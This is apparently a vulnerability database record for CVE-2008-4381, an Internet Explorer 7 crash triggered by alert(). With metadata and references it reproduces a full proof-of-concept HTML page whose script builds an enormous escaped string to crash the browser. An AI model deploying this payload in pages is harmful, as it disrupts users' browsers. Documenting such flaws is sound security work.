Microsoft Internet Explorer alert Function Resource Management Error Vulnerability

Vulnerability ID: 1185091 | Vulnerability type: Resource management error
Published: 2008-10-02 | Updated: 2008-10-02
CVE ID: CVE-2008-4381 | CNNVD-ID: CNNVD-200810-019
Platform: N/A | CVSS score: 5.0
|Vulnerability source
https://www.securityfocus.com/bid/84762
https://cxsecurity.com/issue/WLB-2008100109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200810-019
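|Vulnerability details
Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (application crash) via JavaScript that calls the alert function with a URL-encoded string containing a large number of invalid characters.
|Exploit (EXP)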
<!--

MS Internet Explorer 7 Denial Of Service Exploit

Type :

Denial Of Service

Release Date :

{2007-09-29}

Product / Vendor :

Microsoft

http://www.Microsoft.com

MS Internet Explorer 7 Denial Of Service Exploit :

-->

<title>MS Internet Explorer 7 Denial Of Service Exploit</title>

<body bgcolor="#000000">

<br>

<br>

<center><font face="Verdana" size="2" color="#FF0000"><b>MS Internet Explorer 7 Denial Of Service Exploit</b></font></center>

<br>

<center><img src="http://img81.imageshack.us/img81/8881/wallpaperxl0.jpg"></center>

<br>

<html>

<script>

var x=String.fromCharCode(550);

var x2="";

var x3="";

for(i=0;i<1549;i++)

{x2=x2+x;}

for(i=0;i<1549;i++)

{x3=x3+x2;}

var x4=x;

for(i=0;i<105;i++) x4 += x4;

for(i=0;i<165;i++) x4 += x3;

var wildboy=escape(x4);

alert(wildboy);

</script>

</html>

<center><font face="Verdana" size="2" color="#FF0000"><b>WiLdBoY a.k.a UniquE-Key{UniquE-Cracker} n.s.n Mert KAYALAR</b></font>

<br>

<font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG</b></font>

<br>

<font face="Verdana" size="2" color="#FF0000"><b>-Software Hunter-</b></font></center>

<!--

Tested :

MS Internet Explorer 7

Vulnerable :

MS Internet Explorer 6

MS Internet Explorer 5

Author :

WiLdBoY also known as UniquE-Key N.S.N Mert KAYALAR

UniquE[at]UniquE-Key[dot]ORG

-Software Hunter-

-->
|Affected products
Microsoft Internet Explorer Macintosh Edition 5
|References

Source: XF
Name: ie-alert-function-dos(45639)
Link: http://xforce.iss.net/xforce/xfdb/45639
Source: BUGTRAQ
Name: 20081001 Re: MS Internet Explorer 7 Denial Of Service Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/496926/100/0/threaded
Source: BUGTRAQ
Name: 20080929 MS Internet Explorer 7 Denial Of Service Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/496830/100/0/threaded
Source: MLIST
Name: [oss-security] 20081003 Re: regarding CVE-2008-4382 & CVE-2008-4381
Link: http://www.openwall.com/lists/oss-security/2008/10/03/8
Source: MLIST
Name: [oss-security] 20081003 regarding CVE-2008-4382 & CVE-2008-4381
Link: http://www.openwall.com/lists/oss-security/2008/10/03/7
Source: SREASON
Name: 4345
Link: http://securityreason.com/securityalert/4345